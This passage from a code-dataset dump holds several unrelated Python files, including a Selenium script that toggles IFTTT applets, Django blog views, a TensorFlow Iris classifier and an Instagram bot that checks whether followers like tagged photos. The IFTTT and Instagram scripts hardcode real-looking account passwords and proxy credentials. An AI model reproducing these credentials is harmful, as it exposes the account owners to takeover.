selenium.webdriver.support import expected_conditions as EC\nthreads = []\nactive_trigger = ''\nactive_trigger_service = ''\nresults = {}\ntrigger_fields_of_active_trigger = ''\naction_details_list = []\ntrack_action_services = 
[]\n#############################################################################################\n# ENABLE A SET OF APPLETS FOR A CHOSEN TRIGGER AND TRIGGER SERVICE\n#############################################################################################\n###########################################################################\n# c2436a9ef37d65910c1c05f6d137dbb7d79260d4 wijitha.mahadewa@gmail.com\n# 0dfb5edac5e2201a9ece7b3908dcfd04d57522b6 happybee9494@gmail.com\n# 1b004674987164ecf6ed87c30146aa90b4c21024\n###########################################################################\nuri = 'mongodb://127.0.0.1:27017'\nclient = MongoClient(uri)\ndbClient = client['applets']\nappletcollection = dbClient.get_collection('appletcollection')\nall_applet_details = appletcollection.find({})\n############################################# LOGIN TO IFTTT # #########################################################\noptions = Options()\noptions.add_argument('--headless')\ncap = DesiredCapabilities().FIREFOX\ncap[\"marionette\"] = False\nserv = Service(r'/root/Tools/Firefox/geckodriver')\nbrowser = webdriver.Firefox(capabilities=cap, service=serv,options=options)\nbrowser.get('https://ifttt.com/login?wp_=1')\n\nusername = browser.find_element_by_id(\"user_username\")\npassword = browser.find_element_by_id(\"user_password\")\nusername.send_keys(\"happybee9494@gmail.com\")\npassword.send_keys(\"happyBEE@94\")\nbrowser.find_element_by_name(\"commit\").click()\nprint('Logged In')\n########################################################################################################################\ndef genURLPart(applet_id,applet_title):\n    clean_applet_title = applet_title.strip().lower()\n    clean_applet_title = clean_applet_title.replace('@','-').replace(',','').replace('.','-').replace(\"'\",\"-\")\n    clean_applet_title = clean_applet_title.replace(' ', '-')\n    clean_applet_title = clean_applet_title.replace('--', '-')\n    genURL = str(applet_id)+ \"-\"+clean_applet_title\n    # print(genURL)\n    return genURL\n\ndef toggleAppletConnection(applet_id,applet_title):\n    print('toggleAppletConnection')\n    applet_connect_url = genURLPart(applet_id, applet_title)\n    browser.get('https://ifttt.com/applets/' + str(applet_connect_url))\n    time.sleep(10)\n    element = WebDriverWait(browser, 100).until(EC.element_to_be_clickable((By.CLASS_NAME, \"connect_button__connect-button__3_96C\")))#.send_keys(Keys.RETURN)\n    element.click()\n    time.sleep(10)\n    ## TODO: can check if a text exists on the resulting page to confirm\n    return\n\ndef toggleApplet(active_trigger,active_trigger_service,appletData,track_action_services,action_details_list,trigger_fields_of_active_trigger,attempt):\n    action_details = {}\n    if (appletData['trigger'].strip() == active_trigger.strip()) and (\n            appletData['trigger_service'].strip() == active_trigger_service.strip()):\n        print('Enabling related applet ... 
')\n        trigger_fields_of_active_trigger = appletData['trigger_fields']\n        action_details['action_service'] = appletData['action_service']\n        action_details['action'] = appletData['action']\n        action_details['action_desc'] = appletData['action_desc']\n        action_details['action_fields'] = appletData['action_fields']\n        track_action_services.append(appletData['action_service'])\n        # print(track_action_services)\n        # print(track_action_services.count(appletData['action_service']))\n        if track_action_services.count(appletData['action_service']) == attempt:\n            ##################################################################################################################\n            ########## If applet already enabled continue, otherwise toggle and update database ###############################\n            action_details_list.append(action_details)\n            if appletData['eanbled']:\n                return track_action_services, action_details_list, trigger_fields_of_active_trigger\n            else:\n                toggleAppletConnection(appletData['applet_id'], appletData['applet_title'])\n                newStatus = True\n        else:\n            print('Disabling not related applet ... 1')\n            ##################################################################################################################\n            ########## If applet already disabled continue, otherwise toggle and update database #############################\n            if appletData['eanbled']:\n                toggleAppletConnection(appletData['applet_id'], appletData['applet_title'])\n                newStatus = False\n            else:\n                return track_action_services, action_details_list, trigger_fields_of_active_trigger\n\n    else:\n        print('Disabling not related applet ... 2')\n        ##################################################################################################################\n        ########## If applet already disabled continue, otherwise toggle and update database #############################\n        if not appletData['eanbled']:\n            toggleAppletConnection(appletData['applet_id'], appletData['applet_title'])\n            newStatus = False\n        else:\n            print('not enabled')\n            return track_action_services, action_details_list, trigger_fields_of_active_trigger\n\n    doc = {\n        'applet_id': appletData['applet_id'],\n        'applet_title': appletData['applet_title'],\n        'applet_desc': appletData['applet_desc'],\n        'trigger_service': appletData['trigger_service'],\n        'trigger': appletData['trigger'],\n        'trigger_desc': appletData['trigger_desc'],\n        'trigger_fields': appletData['trigger_fields'],\n        'action_service': appletData['action_service'],\n        'action': appletData['action'],\n        'action_desc': appletData['action_desc'],\n        'action_fields': appletData['action_fields'],\n        'eanbled': appletData['eanbled']\n    }\n    updateddoc = {\n        'applet_id': appletData['applet_id'],\n        'applet_title': appletData['applet_title'],\n        'applet_desc': appletData['applet_desc'],\n        'trigger_service': appletData['trigger_service'],\n        'trigger': appletData['trigger'],\n        'trigger_desc': appletData['trigger_desc'],\n        'trigger_fields': appletData['trigger_fields'],\n        'action_service': appletData['action_service'],\n        'action': appletData['action'],\n        'action_desc': appletData['action_desc'],\n        'action_fields': appletData['action_fields'],\n        'eanbled': newStatus\n    }\n    appletcollection.update(doc, updateddoc, upsert=True)\n    print('db updated')\n    return track_action_services,action_details_list,trigger_fields_of_active_trigger\n\ndef enableOnlyRequiredApplets(trigger, trigger_service, attempt):\n    s1 = timeit.default_timer()\n    active_trigger = trigger\n    active_trigger_service = trigger_service\n    i = 0\n    for appletData in all_applet_details:\n        i = i + 
1\n if i <= 2000:\n continue\n if i%20 == 0:\n time.sleep(25)\n\n print('came here ' + str(i))\n process = Thread(target=toggleApplet,args=[active_trigger, active_trigger_service, appletData, track_action_services, action_details_list,trigger_fields_of_active_trigger,\n attempt])\n process.start()\n threads.append(process)\n e1 = timeit.default_timer()\n print('Time for diff library function= ' + str(e1 - s1))\n\n for process in threads:\n process.join()\n\n results['active_trigger'] = active_trigger\n results['active_trigger_service'] = active_trigger_service\n results['trigger_fields_of_active_trigger'] = trigger_fields_of_active_trigger\n results['action_details_list'] = action_details_list\n print('final results: ')\n print(results)\n return results\n\n\n\n\n\n","sub_path":"Phase2AppletExecution/AppletEnabler.py","file_name":"AppletEnabler.py","file_ext":"py","file_size_in_byte":8448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"409079353","text":"from selenium import webdriver\nfrom pages.home.login_page import *\nfrom utilities.custom_logger import LogGen\nimport logging\nimport pytest\nfrom utilities.teststatus import TestStatus\n\n@pytest.mark.usefixtures(\"oneTimeSetUp\",\"setUp\")\nclass Test_001_Login():\n\n @pytest.fixture(autouse=True)\n def class_setup(self,oneTimeSetUp):\n self.lp = Login_page(self.driver)\n self.ts = TestStatus(self.driver)\n\n\n # @pytest.mark.run(order=2)\n def test_validLogin(self):\n self.lp.login(\"admin@yourstore.com\", \"admin\")\n # logger = LogGen.loggen()\n result1 = self.lp.verifyTitle()\n self.ts.mark(result1, \"Title Verified\")\n result2 = self.lp.verify_login_successful()\n self.ts.final_mark(\"test_validLogin\", result2, \"Login was successful\")\n\n self.lp.logout()\n\n # @pytest.mark.run(order=1)\n def test_invalidLogin(self):\n self.lp.login(\"admin@yourstore.com\", \"admin1\")\n response = self.lp.verify_login_failed()\n assert response == True","sub_path":"tests/home/login_tests.py","file_name":"login_tests.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"12333799","text":"# -*- coding: utf-8 -*-\r\n\r\n'''\r\n#:::::::::::::::::::::#\r\n#:'######':'########':#\r\n#::: ## :::::: ## ::::#\r\n#:.. ## :::::: ## ::::#\r\n#::: ## :::::: ## ::::#\r\n#::: ## :::::: ## ::::#\r\n#::: ## :::::: ## ::::#\r\n#: ###### :::: ## ::::#\r\n#:::::::::::::::::::::#\r\n\r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. 
If not, see <http://www.gnu.org/licenses/>.\r\n'''\r\n\r\nimport json\r\nimport os\r\nimport traceback\r\n\r\nfrom resources.lib.modules import client, control, log_utils\r\n\r\n\r\nclass jsonMenu(object):\r\n    def __init__(self):\r\n        # Default root locations, if none is set by the indexer\r\n        self.local_root = os.path.join(control.addonPath, 'menu')\r\n        self.menu = None\r\n\r\n        self.agent = 'MTNDbG93bnMgSlNPTiBNZW51'[1:].decode('base64')\r\n\r\n    def load(self, menu_file):\r\n        if 'http' in menu_file:\r\n            try:\r\n                header = {'User-Agent': self.agent}\r\n                response = client.request(menu_file, headers=header)\r\n                self.menu = json.loads(response)\r\n            except Exception:\r\n                failure = traceback.format_exc()\r\n                log_utils.log('jsonMenu - Open Remote Exception: \\n' + str(failure))\r\n        else:\r\n            try:\r\n                menu_file = os.path.join(self.local_root, menu_file)\r\n                fileref = control.openFile(menu_file)\r\n                content = fileref.read()\r\n                fileref.close()\r\n                self.menu = json.loads(content)\r\n            except Exception:\r\n                failure = traceback.format_exc()\r\n                log_utils.log('jsonMenu - Open Local Exception: \\n' + str(failure))\r\n","sub_path":"Repository/script.module.miamigrice/lib/resources/lib/modules/jsonmenu.py","file_name":"jsonmenu.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"176891264","text":"from base import *\nfrom devices import *\nimport time\n\nclass Hexiwear(Board):\n    ids_vendor = {\n        \"0D28\":frozenset((\"0204\",))\n    }\n\n    @staticmethod\n    def match(dev):\n        return dev[\"vid\"] in Hexiwear.ids_vendor and dev[\"pid\"] in Hexiwear.ids_vendor[dev[\"vid\"]]\n\n    def reset(self):\n        pass\n\n    def burn(self,bin,outfn=None):\n        fname = fs.get_tempfile(bin)\n        if not self.disk:\n            return False,\"Can't find device disk! Have you mounted the DAP Link device?\"\n        fs.copyfile2(fname,fs.path(self.disk,\"hexiwear.bin\"))\n        fs.del_tempfile(fname)\n        # wait some time to allow virtualization\n        time.sleep(15/256*(len(bin)/1024))\n        return True,\"Ok\"\n","sub_path":"hexiwear.py","file_name":"hexiwear.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"510759201","text":"from back.model import Artist\nfrom front.view_util import display\nfrom validate import validate_name, validate_Art, validate_Email\n\nimport re\n\n\nclass View():\n\n    def __init__(self, view_model):\n        self.view_model = view_model\n\n    def make_menu(self):\n        while True:\n            choice = input('Would you like to...\\n1.Add A New Artist\\n2.Add A New Piece\\n3.Search For Art From A Specific Artist\\n4.Search For All Art From All Artists\\n5.Update The Availability Of A Piece\\n6.Delete A Piece\\nQ.Quit\\n')\n            print()\n            if choice == '1':\n                add_new_artist(self)\n            elif choice == '2':\n                add_new_art(self)\n            elif choice == '3':\n                srch_art_one_artist(self)\n            elif choice == '4':\n                srch_art_all_artist(self)\n            elif choice == '5':\n                update_available(self)\n            elif choice == '6':\n                delete_art(self)\n            elif choice.upper() == 'Q':\n                print('\\nThanks for using the Art Database\\n')\n                break\n            else:\n                print('Please choose a valid menu option, numbers 1-6 or Q for Quit.\\n')\n\n# ADD ARTIST\ndef add_new_artist(self, name=''):\n    # Input Validation\n    \n    isFound = ''\n    if name=='':\n        name = input('What is the name of the artist? ')\n    name = validate_name(name)\n    isFound = search_artist(self, name, first=True)\n\n    if isFound == None:\n        email = input(f\"What is {name}'s email? 
\")\n email = validate_Email(email)\n self.view_model.insert(name, email)\n data = self.view_model.search_artist(name)\n display(data, first=True)\n else:\n print(f\"{name} is already in the system.\\n\")\n\n# ADD NEW ART\ndef add_new_art(self):\n artist = input('What is the name of the artist? ')\n name = validate_name(artist)\n isFound = search_artist(self, artist, first=True)\n\n # Verifying that the artist exists in the database before adding art to their name\n if isFound==None:\n print(f\"{artist} isn't in the system yet please add them first.\")\n add_new_artist(self)\n\n name = input('What is the name of the piece? ')\n data = self.view_model.search_art_name(name)\n if data.exists()!=False:\n print(f\"There is already a piece with the name of {name} in the system\")\n return\n price = input('What is the price of the piece? ')\n available = input('Is this piece sold? ')\n\n name, price, available = validate_Art(name, price, available)\n\n self.view_model.insert_art(name, artist, price, available)\n data = self.view_model.search_art_name(name)\n display(data)\n\n# SEARCH ART FROM ONE ARTIST\ndef srch_art_one_artist(self):\n name = input('What is the name of the artist? ')\n name = validate_name(name)\n isFound = search_artist(self, name)\n\n # Verifying that the artist exists in the database\n if isFound.exists()==None:\n print(f\"{name} isn't in the system yet, maybe try again.\")\n return\n data = self.view_model.search_art_one(name)\n display(data)\n\n# SEARCH ALL ART\ndef srch_art_all_artist(self):\n data = self.view_model.search_art_all()\n display(data)\n\n# UPDATE\ndef update_available(self):\n name = input('What is the name of the artwork whos availability has changed? ')\n data = self.view_model.search_art_name(name)\n\n if data.exists() == False:\n print('Sorry that artwork does not exist')\n return\n for dat in data:\n available = dat.available\n\n rows_updated = self.view_model.update(name, available)\n\n if rows_updated == 0:\n print('There was an error. Your request was not updated')\n return\n\n data = self.view_model.search_art_name(name) \n display(data) \n\n# DELETE\ndef delete_art(self):\n name = input('What is the name of the artwork you would like to delete? ')\n name = validate_name(name)\n isFound = self.view_model.search_art_name(name)\n # Verifying that the art exists in the database\n if isFound.exists()==None:\n print(f\"{name} isn't in the system yet, maybe try again.\")\n return\n display(isFound)\n confirm = input('Are you sure you want to delete this art? (Yes er no?) ')\n while True:\n if confirm.upper()=='YES':\n rows_updated = self.view_model.delete(name)\n if rows_updated == 0:\n print('There was an error. Your request was not deleted\\n')\n else:\n print('Your entry was deleted.\\n')\n break\n elif confirm.upper()=='NO':\n print('Fair enough')\n break\n else:\n confirm=input(\"That's not an actual choice. 
Try again.\")\n\n# SEARCH ARTIST\ndef search_artist(self, name, first=False):\n data = self.view_model.search_artist(name)\n \n # Displaying search results\n if data.exists() == False:\n return None\n for dPoint in data:\n return dPoint","sub_path":"front/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"645379470","text":"import multiprocessing\n\nfrom video_reader import net_sock_server\nfrom video_reader import process\nfrom video_reader import video_reader\n\n\nclass VideoPacketNetSocketReader(video_reader.VideoPacketReader):\n def __init__(self, port=9526):\n self._data_pipe_r, self._data_pipe_w = multiprocessing.Pipe(False)\n self._ack_pipe_r, self._ack_pipe_w = multiprocessing.Pipe(False)\n self._semaphore = multiprocessing.BoundedSemaphore(1) # no concurrency allowed\n self._server_process = process.ServerProcess(\"video packet net socket reading process\",\n net_sock_server.video_net_socket_reader_server,\n self._data_pipe_w, self._ack_pipe_r, self._semaphore, port)\n ret = self._server_process.start()\n if ret:\n print(\"%s is running\" % self._server_process.name())\n\n print(\"net socket based video packet reader created, port = %d\" % port)\n\n def read(self):\n try:\n rtp_pkt = self._data_pipe_r.recv()\n except EOFError: # write pipe connection closed\n print(\"BUG: write pipe connection should not be closed before reader release\")\n return False, None\n except Exception as e:\n print(\"failed to receive video packet from the pipe: %s\" % str(e))\n return False, None\n\n try:\n self._ack_pipe_w.send(\"\")\n except ValueError as e:\n print(\"WARN: failed to send ack to the pipe: %s\" % str(e))\n\n return True, rtp_pkt\n\n def release(self):\n self._server_process.stop();\n\n self._data_pipe_r.close()\n self._data_pipe_w.close()\n self._ack_pipe_r.close()\n self._ack_pipe_w.close()\n\n print(\"net socket based video packet released\")\n","sub_path":"src/main/resources/riverrun-noarch/VideoEmitterFunction/video_reader/net_sock.py","file_name":"net_sock.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"572577635","text":"from django.shortcuts import render, get_object_or_404 ,redirect\nfrom django.utils import timezone\nfrom .models import Post\nfrom .forms import PostForm\nfrom django.http import HttpResponse\n\ndef post_list(request):\n \n language = 'en-gb'\n session_language = 'en-gb'\n if 'lang' in request.COOKIES:\n language = request.COOKIES['lang'] \n if 'lang' in request.session:\n session_language = request.session['lang']\n \n posts = Post.objects.filter(published_date__lte=timezone.now()).order_by('published_date')\n return render(request, 'blog/post_list.html', {'posts': posts ,'language': language ,'session_language': session_language})\n\ndef post_detail(request, pk):\n post = get_object_or_404(Post, pk=pk)\n return render(request, 'blog/post_detail.html',{'post':post})\n\ndef post_new(request):\n if request.method == \"POST\":\n form = PostForm(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.published_date = timezone.now()\n post.save()\n return redirect('post_detail', pk=post.pk)\n else:\n form = PostForm()\n return render(request, 'blog/post_edit.html', {'form': form})\n\ndef post_edit(request, pk):\n post = get_object_or_404(Post, pk=pk)\n if request.method == \"POST\":\n form = 
PostForm(request.POST, instance=post)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.published_date = timezone.now()\n post.save()\n return redirect('post_detail', pk=post.pk)\n else:\n form = PostForm(instance=post)\n return render(request, 'blog/post_edit.html', {'form': form})\n\ndef language(request, language='en-gb'):\n response = HttpResponse('Setting language to %s' %language)\n response.set_cookie('lang',language)\n request.session['lang'] = language\n return response\n\n","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"565087676","text":"from urllib.parse import urljoin\r\nfrom functools import reduce\r\nimport operator\r\nimport re\r\n\r\nfrom .core import *\r\nfrom .vparsers import *\r\nfrom .utils import attributeerror_wrapper\r\n\r\n\r\nclass NowaInspiracjaParser(\r\n SingleSourceMixin, SingleRequestLoaderMixin, BaseParser\r\n):\r\n middlewares = [ DecodeMiddleware(), BeautifulSoupMiddleware() ]\r\n parsers = {\r\n \"int\": IntParser(), \"float\": FloatParser(), \"price\": PriceParser()\r\n }\r\n\r\n url = \"http://blockpol.pl/invest/nowa-inspiracja/wyszukiwarka/\"\r\n method = \"GET\"\r\n headers = {\r\n \"Host\": \"blockpol.pl\",\r\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0\",\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\r\n \"Accept-Language\": \"en-US,en;q=0.5\",\r\n \"Accept-Encoding\": \"gzip, deflate\",\r\n \"Connection\": \"keep-alive\",\r\n \"Upgrade-Insecure-Requests\": \"1\"\r\n }\r\n params = {\r\n \"investment\": 472,\r\n \"surface_min\": \"\",\r\n \"surface_max\": \"\",\r\n \"rooms\": \"\",\r\n \"search-submit\": \"Szukaj+mieszkań\",\r\n \"search-id\": \"home1\"\r\n }\r\n \r\n @attributeerror_wrapper(return_value=[])\r\n def find_records(self, soup):\r\n return soup.find(\"div\", {\"class\": \"search-results__list\"})\\\r\n .find_all(\"a\", {\"class\": \"search-result\"})\r\n \r\n def parse_record(self, soup):\r\n record = {\r\n \"number\": self.get_flat_number(soup),\r\n \"plan\": soup.get(\"href\", None),\r\n \"price\": self.parsers[\"price\"](soup.get(\"data-price\", None)),\r\n \"price_m2\": self.parsers[\"price\"](soup.get(\"data-pricepermeter\", None)),\r\n \"area\": self.parsers[\"float\"](soup.get(\"data-surface\", None)),\r\n \"status\": self.parsers[\"int\"](soup.get(\"data-status\", None))\r\n }\r\n record.update(self.get_rooms_and_floor(soup))\r\n return record\r\n\r\n @tryexcept_wrapper((AttributeError, IndexError), return_value=None)\r\n def get_flat_number(self, soup):\r\n return soup.find(\"h3\", {\"class\": \"search-result__header\"})\\\r\n .text.split(\",\")[-1].strip()\r\n\r\n @tryexcept_wrapper((AttributeError, IndexError), return_value={})\r\n def get_rooms_and_floor(self, soup):\r\n lis = soup.find(\"ul\", {\"class\": \"search-result__info\"}).find_all(\"li\")\r\n attrs = [ re.search(\"\\d+\", li.text).group(0) for li in lis[1:-1] ]\r\n return dict(\r\n rooms=self.parsers[\"int\"](attrs[0]),\r\n floor=self.parsers[\"int\"](attrs[1])\r\n )\r\n\r\n def modify_record(self, record, raw_record):\r\n record[\"fid\"] = record[\"number\"]\r\n return record","sub_path":"parsers/nowainspiracja.py","file_name":"nowainspiracja.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} 
+{"seq_id":"530961373","text":"import tensorflow as tf\nimport numpy as np\nfrom copy import copy\nfrom random import shuffle\n\n\ndef load_iris_data():\n flower_data = []\n label_data = []\n\n labels = []\n features_max = []\n\n print('+ Load data ...')\n with open('data/bezdekIris.data', 'r') as iris_file:\n for line in iris_file.readlines():\n cur_line = [elm.strip() for elm in line.split(',')]\n\n if len(cur_line) == 5:\n cur_label = cur_line[-1]\n if cur_label not in labels:\n labels.append(cur_label)\n\n label_data.append(labels.index(cur_label))\n\n features = [float(elm) for elm in cur_line[:-1]]\n if len(features_max) == 0:\n features_max = [elm for elm in features]\n else:\n for idx, feature in enumerate(features):\n if features_max[idx] < feature:\n features_max[idx] = feature\n\n flower_data.append(features)\n \n features_max = np.array(features_max, np.float64)\n\n flower_data = np.divide(np.array(flower_data, np.float64), features_max)\n ##\n # expand labels (one hot vector)\n tmp = np.zeros((len(label_data), len(labels)))\n tmp[np.arange(len(label_data)), label_data] = 1\n label_data = tmp\n\n print('+ flowers: \\n', flower_data)\n print('+ labels: \\n', label_data)\n\n print('+ loading done!')\n return flower_data, label_data\n\n\ndef batch(data, label, size):\n out_data = []\n out_label = []\n for index, elm in enumerate(data):\n if len(out_data) < size:\n out_data.append(elm)\n out_label.append(label[index])\n else:\n yield out_data, out_label\n out_data = []\n out_label = []\n\n\ndef main():\n images_data, label_data = load_iris_data()\n\n train_percentage = 0.8\n\n train_data = []\n train_labels = []\n\n test_data = []\n test_labels = []\n\n train_size = int(len(images_data) * train_percentage)\n train_count = 0\n num_round = 5\n\n indexes = [_ for _ in range(len(images_data))]\n\n for round_ in range(num_round):\n shuffle(indexes)\n #print(\"+ indexes\", indexes)\n for index in indexes:\n if train_count < train_size:\n train_data.append(copy(images_data[index]))\n train_labels.append(copy(label_data[index]))\n train_count += 1\n else:\n test_data.append(copy(images_data[index]))\n test_labels.append(copy(label_data[index]))\n train_count = 0\n\n print(\"+ train size:\", len(train_data))\n print(\"+ test size:\", len(test_data))\n\n LABEL_SIZE = len(train_labels[0])\n FEATURE_SIZE = len(train_data[0])\n\n # Create the model\n x = tf.placeholder(tf.float32, [None, FEATURE_SIZE])\n W = tf.Variable(tf.zeros([FEATURE_SIZE, LABEL_SIZE]))\n b = tf.Variable(tf.zeros([LABEL_SIZE]))\n y = tf.matmul(x, W) + b\n\n # Define loss and optimizer\n y_ = tf.placeholder(tf.float32, [None, LABEL_SIZE])\n\n cross_entropy = tf.reduce_mean(\n tf.nn.softmax_cross_entropy_with_logits(y, y_))\n train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)\n\n sess = tf.InteractiveSession()\n # Train\n tf.initialize_all_variables().run()\n\n step_size = 4\n for batch_xs, batch_ys in batch(train_data, train_labels, step_size):\n sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys})\n\n # Test trained model\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n print(\"+ Accuracy: \", sess.run(accuracy, feed_dict={x: test_data,\n y_: test_labels}))\n\n print(\"+ W:\\n{}\".format(sess.run(W)))\n print(\"+ b:\\n{}\".format(sess.run(b)))\n\nif __name__ == '__main__':\n import sys\n sys.exit(int(main() or 
0))\n","sub_path":"source_data/test_iris_nn.py","file_name":"test_iris_nn.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"639596933","text":"import io\nsource = \"day1Input.txt\"\nresult = 0\n\n\nf = open(\"day1Input.txt\", 'r')\nstr = f.read(1)\nwhile(str is not \"\"):\n if(str is '('):\n result = result + 1\n elif(str is ')'):\n result = result - 1\n str = f.read(1)\nprint (result)\n\ninput(\" press enter to exit \")\n","sub_path":"day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"417593","text":"import os\nimport sys\nimport argparse\nfrom sys import platform # mac or linux\nimport huepy # for color print\nfrom datetime import datetime\nfrom tqdm import tqdm\n\nhello = '''\n _________________________________________\n\n INSTAGRAM TAG checker by @kirillovmr\n _________________________________________\n'''\n\nprint(hello)\n\nif \"darwin\" in platform.lower():\n print(\"\\tЗапущено на платформе MAC OS\\n\")\n path_ = \"/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/instabot\"\nelif \"linux\" in platform.lower():\n print(\"\\tЗапущено на платформе LINUX\\n\")\n path_ = \"/usr/local/lib/python3.5/dist-packages/instabot\"\nelif \"win32\" in platform.lower():\n print(\"\\tЗапущено на платформе WINDOWS\\n\")\n path_ = \"c:\\\\users\\\\user\\\\appdata\\\\local\\\\programs\\\\python\\\\python37\\\\lib\\\\site-packages\\\\instabot\"\nelse:\n print(\"This platform is not supported. Exiting...\")\n exit()\n\ndef console_print(text, color=None):\n if color is not None:\n text = getattr(huepy, color)(text)\n print(text)\n\nsys.path.append(path_)\nfrom instabot import Bot, utils\n\nlogin = \"_friendly_company\"\npassword = \"arina4ever699516\"\nproxy = \"http://oxanaroma:A0z2CkV@31.41.219.235:65233\"\npost_link = \"https://www.instagram.com/p/\"\nresult_filename = 'result.txt'\nvip_filename = 'vip.txt'\n\n# Creating folders\ndir = \"{}/accs/{}/a\".format(path_, login)\ndir0 = \"{}/accs/{}\".format(path_, login)\nif not os.path.exists(dir):\n os.makedirs(dir)\nif not os.path.exists(dir0 + '/tags'):\n os.makedirs(dir0 + '/tags')\n\n# Changing directory to instabot/accs/bot_id\nos.chdir(dir)\n\nbot = Bot()\nbot.login(username=login, password=password, proxy=proxy)\n\n# Creating dict of bad users\nbad_users = {}\n\n# Loading id -> username dict\nfollowers_id_name = {}\ntry:\n f = open('usernames.txt', 'r')\n for line in f:\n split = line.split(':')\n id = split[0]\n # обрезаем \\n\n split2 = split[1].split('\\n')\n username = split2[0]\n followers_id_name[id] = username\n f.close()\nexcept:\n print(\"Loaded file with usernames was not found.\")\n\n# Get list of VIP Users\nvip = bot.read_list_from_file('../' + vip_filename)\n\n# Deleting repeated items\nvip = list(set(vip))\n\n# Converting usernames to id\nvip_id = []\nfor v in vip:\n vip_id.append(bot.convert_to_user_id(v))\n\n# Getting followers\nfollowers = bot.followers\n\n# Removing vip users from followers\nusers_to_check = [x for x in followers if x not in vip_id]\n\nh = bot.get_user_tags_medias(bot.get_user_id_from_username(login))\n# Deleting repeated items\nposts = list(set(h))\n\n# users_to_check = users_to_check[0:180]\n# posts = posts[0:10]\n\n# Получаем список лайков под всеми фото в хештеге\nnew_posts = []\nfor post in tqdm(posts, desc=\"Получаем список лайков\"):\n 
new_posts.append({'post': post, 'likers': bot.get_media_likers(post)})\n\n# for user in users_to_check:\nfor user in tqdm(users_to_check, desc=\"Проверяем лайки\"):\n for post in new_posts:\n likers = post['likers']\n try:\n likers.index(user)\n except ValueError:\n try:\n bad_users[user][\"num\"] += 1\n if(len(bad_users[user][\"proof\"]) < 2):\n bad_users[user][\"proof\"].append(post['post'])\n except KeyError:\n bad_users[user] = {}\n bad_users[user][\"username\"] = user\n bad_users[user][\"num\"] = 1\n bad_users[user][\"proof\"] = []\n bad_users[user][\"proof\"].append(post['post'])\n\nmadiaid_code = {}\n# [PROOF] Convert media id to link\nfor u in tqdm(bad_users, desc=\"Конвертация\"):\n id = bad_users[u][\"username\"]\n try:\n username = followers_id_name[id]\n except KeyError:\n username = bot.get_username_from_user_id(id)\n followers_id_name[id] = username\n bad_users[u][\"username\"] = username\n proofs_link = []\n for post_id in bad_users[u][\"proof\"]:\n try:\n code = madiaid_code[post_id]\n except KeyError:\n media_info = bot.get_media_info(post_id)\n code = media_info[0]['code']\n madiaid_code[post_id] = code\n proofs_link.append(post_link + code)\n bad_users[u][\"proof\"] = proofs_link\n\n# Saving usernames dict\nf = open('usernames.txt', 'w')\nfor u in followers_id_name:\n try:\n f.write(u + ':' + followers_id_name[u] + '\\n')\n except TypeError:\n print(\"Cant write {}:{} in followers.txt\".format(u, followers_id_name[u]))\nf.close()\n\n# Export results in file\ndate = datetime.today().strftime(\"%d.%m.%Y %H;%M\")\nresult_filename = date + '.txt'\nf = open('../tags/' + result_filename, 'w')\nf.write(\"Отчет по фото со мной\\n\")\nf.write(\"Сгенерирован {}\\n\\n\".format(date))\n\nfor u in bad_users:\n f.write(\"{} - {} пропусков.\\n\".format(bad_users[u]['username'], bad_users[u]['num']))\n for proof in bad_users[u][\"proof\"]:\n f.write(proof + '\\n')\n f.write('\\n\\n')\nf.close()\n\nconsole_print('\\n\\tКоличество аккаунтов не выполнивших условия: {}\\n'.format(len(bad_users)), color='purple')\nconsole_print('Результаты сохранены в файле {}\\n'.format(result_filename), color='purple')\ninput(\"\")\n","sub_path":"check_tags.py","file_name":"check_tags.py","file_ext":"py","file_size_in_byte":5357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"304390160","text":"import math\nfrom util import manhattanDistance\nfrom game import Directions\nimport random, util\n\nfrom game import Agent\n\nclass ReflexAgent(Agent):\n \"\"\"\n A reflex agent chooses an action at each choice point by examining\n its alternatives via a state evaluation function.\n\n The code below is provided as a guide. You are welcome to change\n it in any way you see fit, so long as you don't touch our method\n headers.\n \"\"\"\n def __init__(self):\n self.lastPositions = []\n self.dc = None\n\n\n def 